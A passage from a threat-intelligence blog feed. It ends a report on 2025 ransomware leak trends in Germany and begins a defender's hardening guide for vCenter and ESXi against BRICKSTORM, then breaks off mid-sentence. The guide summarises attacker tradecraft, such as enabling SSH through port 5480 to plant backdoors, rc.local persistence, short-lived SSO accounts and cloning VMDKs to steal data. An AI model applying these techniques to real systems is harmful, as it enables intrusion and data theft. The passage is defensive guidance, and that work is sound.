src="https://storage.googleapis.com/gweb-cloudblog-publish/images/german-cybercrime-fig5.max-1000x1000.png" alt="Leaked data of a German company (name redacted) by SafePay"> </a> <figcaption class="article-image__caption "><p data-block-key="5vw12">Figure 5: Leaked data of a German company (name redacted) by SafePay</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">No Such Thing as Too Small: Targeting of the Mittelstand </span></h3> <p><span style="vertical-align: baseline;">There is a persistent myth that small businesses are "too small" to be targeted, a perception often fueled by the fact that large global corporations often dominate cyber crime headlines. However, the 2025 data tells a different story: organizations with fewer than 5,000 employees accounted for 96% of all ransomware leaks in Germany. While this figure largely aligns with the structural composition of the German economy, it underscores a concerning disconnect between public perception and actual targeting patterns. While "big game" hits make the news, the high volume of leaks among medium<span style="vertical-align: baseline;">- </span>and small-sized victims proves they are highly attractive targets for cyber criminals—often because they lack the extensive security personnel and specialized resources of their larger counterparts.</span></p> <p><span style="vertical-align: baseline;">The targeting of the Mittelstand creates a significant secondary risk for large German enterprises and multinationals. While a major corporation may have robust defenses, its broader ecosystem of suppliers and contractors often manages sensitive data or maintains privileged network access. To address these systemic gaps, large enterprises must evolve from passive monitoring to a proactive third-party risk management framework, implementing vendor tiering and enforcing multifactor authentication to neutralize the lateral movement favored by modern cyber criminals.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/german-cybercrime-fig6.max-1000x1000.jpg" alt="Size of victim organizations found on data leak sites"> </a> <figcaption class="article-image__caption "><p data-block-key="5vw12">Figure 6: Size of victim organizations found on data leak sites</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Targeting Beyond the Assembly Line</span></h3> <p><span style="vertical-align: baseline;">Germany's industrial base remains the primary focus for cyber criminals with manufacturing accounting for 23% of all dark web leaks in 2025. However, the German cyber criminal landscape is characterized by its variety, with legal &amp; professional services (14%), construction &amp; engineering (11%), and retail (10%) all targeted.</span></p> <p><span style="vertical-align: baseline;">The most notable shift in the 2025 data is the growth within the legal &amp; professional services sector. This increase is likely intentional: these firms represent high-value targets because they serve as trusted custodians of sensitive client data, including intellectual property, financial strategies, and M&amp;A plans. This allows cyber criminals to extract significant extortion payments beyond their primary victim and gain downstream leverage over an entire client base.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/german-cybercrime-fig7.max-1000x1000.jpg" alt="Data leak victims in Germany by industry"> </a> <figcaption class="article-image__caption "><p data-block-key="5vw12">Figure 7: Data leak victims in Germany by industry</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Outlook  </span></h3> <p><span style="vertical-align: baseline;">The data from 2025 reveals that the recent surge in German leaks is not an isolated incident, but a return to the high-pressure levels previously observed in 2022 and 2023. This resurgence reflects a more volatile and linguistically diverse European threat landscape going into 2026. The 92% growth in German leaks, tripling the European average for 2025, proves that non-English-speaking nations remain a primary target for global extortion groups. </span></p> <p><span style="vertical-align: baseline;">The disruption of established brands like LockBit has rebalanced the ecosystem into a crowded field of agile data leak sites, such as SafePay and Qilin. These groups appear to be hitting Germany in lockstep with their global expansion, identifying the Mittelstand and German professional services as high-volume, target-rich environments. As threat actors continue to exploit complex supply chains, smaller organizations will remain critical pivot points for those aiming at the top of the industrial stack.</span></p> <p><span style="vertical-align: baseline;">Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper,</span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span style="vertical-align: baseline;"> </span><span style="text-decoration: underline; vertical-align: baseline;">Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a><span style="vertical-align: baseline;">.</span></p></div>Wed, 15 Apr 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/europe-data-leak-landscape/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/europe-data-leak-landscape/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/vsphere-brickstorm-defender-guide/<div class="block-paragraph_advanced"><p>Written by: Stuart Carrera</p> <hr/></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Building on </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">recent BRICKSTORM research</span></a><span style="vertical-align: baseline;"> from Google Threat Intelligence Group (GTIG), this post explores the evolving threats facing virtualized environments. These operations directly target the VMware vSphere ecosystem, specifically the vCenter Server Appliance (VCSA) and ESXi hypervisors. To help organizations stay ahead of these risks, we will focus on the essential hardening strategies and mitigating controls necessary to secure these critical assets.</span></p> <p><span style="vertical-align: baseline;">By establishing persistence at the virtualization layer, threat actors operate beneath the guest operating system where traditional security protections are ineffective. This strategy takes advantage of a significant visibility gap, as these control planes do not support standard endpoint detection and response (EDR) agents and have historically received less security focus than traditional endpoints.</span></p> <p><span style="vertical-align: baseline;">This activity is not the result of a security vulnerability in vendors' products or infrastructure. Instead, these intrusions rely on the effectiveness of exploiting weak security architecture and identity design, a lack of host-based configuration enforcement, and limited visibility within the virtualization layer. By operating within these unmonitored areas, attackers can establish long-term persistence and gain administrative control over the entire vSphere environment.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/vsphere-brickstorm-fig1.max-1000x1000.jpg" alt="BRICKSTORM vSphere attack chain"> </a> <figcaption class="article-image__caption "><p data-block-key="xm3ui">Figure 1: BRICKSTORM vSphere attack chain</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p>This guide provides a framework for an infrastructure-centric defense. To help automate some of this guidance and secure the control plane against threats like BRICKSTORM, Mandiant released a <a href="https://github.com/mandiant/vcsa-hardening-tool" rel="noopener" target="_blank">vCenter Hardening Script</a> that enforces these security configurations directly at the Photon Linux layer. By implementing these recommendations, organizations can transform the virtualization layer into a hardened environment capable of detecting and blocking persistent threats.</p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">vCenter Server Appliance Risk Analysis</span></h3> <p><span style="vertical-align: baseline;">The vCenter Server Appliance (VCSA) is the central point of control and trust for the vSphere infrastructure. Running on a specialized Photon Linux operating system, the VCSA typically hosts critical Tier-0 workloads, such as domain controllers and privileged access management (PAM) solutions. This means the underlying virtualization platform inherits the same classification and risk profile as the highly sensitive assets it supports.</span></p> <p><span style="vertical-align: baseline;">A compromise of the vCenter control plane grants an attacker administrative control over every managed ESXi host and virtual machine, effectively rendering traditional organizational tiering irrelevant. Because the VCSA is a purpose-built appliance, relying on out-of-the-box defaults is often insufficient; achieving a Tier-0 security standard requires intentional, custom security configurations at both the vSphere and the underlying Photon Linux layers. </span></p> <p><span style="vertical-align: baseline;">For a threat actor, the VCSA provides:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Centralized Command:</strong><span style="vertical-align: baseline;"> This provides the ability to power off, delete, or reconfigure any virtual machine combined with the ability to reset root credentials on any managed ESXi host providing full control of the hypervisor.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Total Data Access: </strong><span style="vertical-align: baseline;">Access to the underlying storage (VMDKs) of every application, bypassing operating system permissions and traditional file system security. This provides a direct path for data exfiltration of Tier-0 assets.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Command-Line Logging Gaps:</strong><span style="vertical-align: baseline;"> If an attacker gains access to the underlying Photon OS shell via Secure Shell (SSH), there is no remote logging of the shell commands.</span></p> </li> </ul> <h4><span style="vertical-align: baseline;">Management Plane Dependencies</span></h4> <p><span style="vertical-align: baseline;">Many organizations host their Active Directory domain controllers as virtual machines (VMs) within the same vSphere cluster managed by a vCenter that is itself AD-integrated. If an attacker disables the virtual network or encrypts the datastores, vCenter loses its ability to authenticate administrators. In a scenario where the VCSA is encrypted or wiped, the tools required for large-scale recovery are also lost. This forces organizations to rely on manual restores via individual ESXi hosts, extending the recovery timeline exponentially.</span></p> <h4><span style="vertical-align: baseline;">vSphere 7 End of Life</span></h4> <p><span style="vertical-align: baseline;">vSphere 7 reached End of Life (EoL) in October 2025. Organizations with this legacy technical debt will have vSphere software entering a window (until upgrade) where they will no longer receive critical security patches. This provides an opportunity for threat actors to exploit known vulnerabilities that will not be fixed.</span></p> <h3><span style="vertical-align: baseline;">The Strategic Advantage of Proactive Measures</span></h3> <p><span style="vertical-align: baseline;">To secure the control plane, organizations should adopt a strategy where the infrastructure itself acts as the primary line of defense. </span></p> <p><span style="vertical-align: baseline;">A resilient defense relies on two strategies:</span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Technical Hardening: </strong><span style="vertical-align: baseline;">Defense-in-depth should be applied to the hypervisor layer to reduce the attack surface. Threat actors target insecure defaults. Hardening measures, such as enabling Secure Boot, strictly firewalling management interfaces, and disabling shell access, create “friction.” When a threat actor attempts to write a persistence script to </span><code><span style="vertical-align: baseline;">/etc/rc.local.d</span></code><span style="vertical-align: baseline;"> or modify a startup file, a hardened configuration can block the action or force the actor to use methods that generate excessive log telemetry.</span></li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">High-Fidelity Signal Analysis:</strong><span style="vertical-align: baseline;"> Threat actors are adept at rotating infrastructure and recompiling tools to change their signatures. Relying on a blocklist of bad IPs or a database of known malware hashes is not an effective strategy as threat actors utilize command-and-control servers and native binaries. Instead, the focus should shift entirely to behavioral patterns.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Building on this strategic foundation where the infrastructure itself acts as the primary line of defense, this guide outlines four phases of technical enforcement:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Phase 1: Benchmarking and Base Controls</strong><span style="vertical-align: baseline;"> – Establishing the foundation with Security Technical Implementation Guides (STIG) and patching.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Phase 2: Identity Management</strong><span style="vertical-align: baseline;"> – Hardening administrative access to critical infrastructure via PAWs and PAM solutions. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Phase 3: vSphere Network Hardening</strong><span style="vertical-align: baseline;"> – Eliminating lateral movement with Zero Trust networking. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Phase 4: Logging and Forensic Visibility</strong><span style="vertical-align: baseline;"> – Transforming the appliance into a proactive security sensor.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Phase 1: Benchmarking and Base Controls</span></h3> <p><span style="vertical-align: baseline;">Organizations should use the hardening measures outlined in the </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant vSphere hardening blog post</span></a><span style="vertical-align: baseline;"> combined with a strict patching and upgrade strategy. This provides a standard foundation to develop a strong security posture. By implementing an enhanced security baseline centered on the Photon Linux DISA STIG and VMware security hardening guides, organizations can harden the OS-level components that actors target.</span></p> <p><strong style="vertical-align: baseline;">Key Frameworks:</strong></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://www.stigviewer.com/stigs/vmware_vsphere_70_vcenter_appliance_photon_os" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">VMware vSphere 7.0 VCSA Photon OS STIG</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://www.stigviewer.com/stigs/vmware_vsphere_80_vcenter_appliance_photon_os_40" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">VMware vSphere 8.0 VCSA Photon OS STIG</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-configuration-hardening-guide/vsphere" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">VMware vSphere Security Hardening Guides</span></a></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><a href="https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/ransomware-resources/BRICKSTORM" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">VMware BRICKSTORM Resources and Defense</span></a></p> </li> </ul> <p><strong style="vertical-align: baseline;">STIG Control Mappings to Attacker TTPs</strong></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">STIG ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Control Title</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">TTP </strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Detail </strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.stigviewer.com/stigs/vmware_vsphere_80_vcenter/2025-06-09/finding/V-258910" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">V-258910</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Require Multi-factor authentication (MFA)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Establish Foothold / Privilege Escalation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MFA on vCenter web login prevents compromised Active Directory credentials from granting full access.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.stigviewer.com/stigs/vmware_vsphere_70_vcenter/2023-12-21/finding/V-256337" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">V-256337</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Real-time Alert on SSO Account Actions</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Persistence / Anti-Forensics</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Creates local accounts, deploys backdoors, and deletes the accounts within minutes. Real-time alerting on PrincipalManagement events is required to catch this activity.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.stigviewer.com/stigs/vmware_vsphere_80_vcenter/2025-06-09/finding/V-258921" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">V-258921</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Verify User Roles (Least Privilege)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Data Exfiltration</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identifies and removes excessive permissions from standard user roles that are aggregated into non-admin roles.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://stigviewer.cyberprotection.com/stigs/vmware_vsphere_8.0_vcenter/2025-06-09/finding/V-258956" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">V-258956</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Limit membership to "BashShellAdministrators"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Escalate Privileges</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Even if an attacker compromises a vSphere Admin account, they cannot access the Photon OS bash shell unless that account is in this specific single sign-on (SSO) group. It blocks the "VAMI-to-Shell" pivot used to deploy backdoors.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://www.stigviewer.com/stigs/vmware_vsphere_80_vcenter/2025-06-09/finding/V-258968" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">V-258968</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Disable SSH Enablement </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Initial Access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Actors often use the VAMI (Port 5480) to enable SSH before deploying the backdoor. This control ensures that SSH is "Disabled."</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">STIG controls mapping</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">vSphere Infrastructure-Level Data Exfiltration</span></h4> <p><span style="vertical-align: baseline;">Standard vSphere configurations typically mask high-risk permissions such as VM cloning and exporting within generalized administrative roles, allowing these actions to blend into the background noise of routine operations. This architecture provides a threat actor with the means to execute a silent exfiltration of a domain controller or credential repository. Organizations should transition from a model of permissive vSphere access control to a comprehensive cryptographic enforcement policy.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Security Control</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">What It Protects Against</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Implementation Method</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vSphere VM Encryption</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Theft of VMDK files from the datastore; offline analysis and snapshot of memory</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Enable in VM Policies (Requires a KMS)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">In-Guest Encryption (BitLocker)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mounting the VMDK to another VM; offline file system browsing</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Enable inside Windows OS (Requires a vTPM)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vMotion Encryption</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Capture of in-memory credentials (krbtgt hashes) during live migration</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Set vMotion to "Required" in VM Options</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Virtual TPM (vTPM) &amp; Secure Boot</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Bootkit persistence and tampering; strengthens in-guest features like Credential Guard</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Enable in VM Options (Hardware &amp; Boot sections)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Lock Boot Order &amp; BIOS</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Booting from a malicious ISO to reset passwords or bypass security controls</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Set a VM BIOS password and configure boot options</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Disable Copy/Paste</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Silent data exfiltration of credentials or secrets via the VM console</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Set VM Advanced Settings (</span><code style="vertical-align: baseline;">isolation.tools.* = true</code><span style="vertical-align: baseline;">)</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Recommended controls for data exfiltration mitigation</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Resilience against vSphere data exfiltration requires a shift in how high-value virtual assets are governed:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Mandatory Tier-0 Encryption: </strong><span style="vertical-align: baseline;">The enforcement of vSphere-native VM encryption is the primary and most essential control for all critical Tier-0 virtual machines. Organizations should mandate that every domain controller, certificate authority, and password vault be encrypted at the virtual machine level. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Cryptographic Isolation:</strong><span style="vertical-align: baseline;"> Tier-0 assets should be subject to a unique key-locked encryption policy. By mandating a separate key management server (KMS) cluster for these workloads, organizations ensure that a threat actor cannot unlock a cloned disk without access to a secure, hardware-backed vault.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Entitlement De-coupling:</strong><span style="vertical-align: baseline;"> The "Clone" and "Export" privileges should be stripped from standard administrative roles. These functions should be reassigned to a highly restricted, auditable "break-glass" identity, used exclusively for emergency recovery scenarios.</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Phase 2: Identity Management</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">Best practices for Identity management in vSphere focuses on mandating all vSphere administrative sessions originate from dedicated privileged access workstations and utilize a PAM while also enforcing host-level hardening through the restriction of the vpxuser shell access.</span></p> <h4><span style="vertical-align: baseline;">Privileged Access Workstations (PAWs)</span></h4> <p><span style="vertical-align: baseline;">To prevent a threat actor from pivoting to the virtualization management plane from compromised user endpoints or appliances, administrative sessions should originate from a dedicated PAW. This is a dedicated hardened workstation only utilized when interfacing with vSphere administrative functions or interfaces.</span></p> <h4><span style="vertical-align: baseline;">Privileged Access Management (PAM)</span></h4> <p><span style="vertical-align: baseline;">PAM tools serve as an intermediary to mitigate specific threats such as the </span><code style="vertical-align: baseline;">BRICKSTEAL</code><span style="vertical-align: baseline;"> credential harvester. By mandating credential injection, organizations ensure that passwords are never typed or exposed in memory on the target system where malware could intercept them. Automated secret rotation should be enforced to limit the lifespan of any compromised credentials, particularly for root passwords and service account keys. </span></p> <h4><span style="vertical-align: baseline;">Authentication and Platform Hardening</span></h4> <p><span style="vertical-align: baseline;">Accounts residing in the default </span><code style="vertical-align: baseline;">vsphere.local</code> <span style="vertical-align: baseline;">single sign-on (SSO) domain, most notably the built-in </span><span style="vertical-align: baseline;">a</span><code style="vertical-align: baseline;">dministrator@vsphere.local</code> <span style="vertical-align: baseline;">superuser, pose a specific security risk because they do not support modern MFA integration. Due to this limitation, organizations should limit the use of </span><code style="vertical-align: baseline;">vsphere.local</code><span style="vertical-align: baseline;"> accounts for daily administration; instead, they should be treated as emergency "break-glass" credentials that are secured with complex, vaulted passwords.</span><span style="vertical-align: baseline;"> </span></p> <h4><span style="vertical-align: baseline;">The vSphere VPXUSER</span></h4> <p><span style="vertical-align: baseline;">The </span><code style="vertical-align: baseline;">vpxuser</code><span style="vertical-align: baseline;"> is a high-privilege system account provisioned by vCenter on each managed host to facilitate core infrastructure management operations.</span></p> <p><span style="vertical-align: baseline;">A threat actor possessing administrative control over the VCSA effectively inherits the delegated authority of the </span><code style="vertical-align: baseline;">vpxuser</code> <span style="vertical-align: baseline;">across the entire managed cluster. This entitlement enables a pivot from the management plane to the host-level shell.</span></p> <h4><span style="vertical-align: baseline;">The Primary Mitigation (vSphere ESXi 8.0+): Disabling Shell Access</span></h4> <p><span style="vertical-align: baseline;">To mitigate this lateral movement vector, vSphere 8.0 introduced a technical control allowing administrators to remove shell access from the 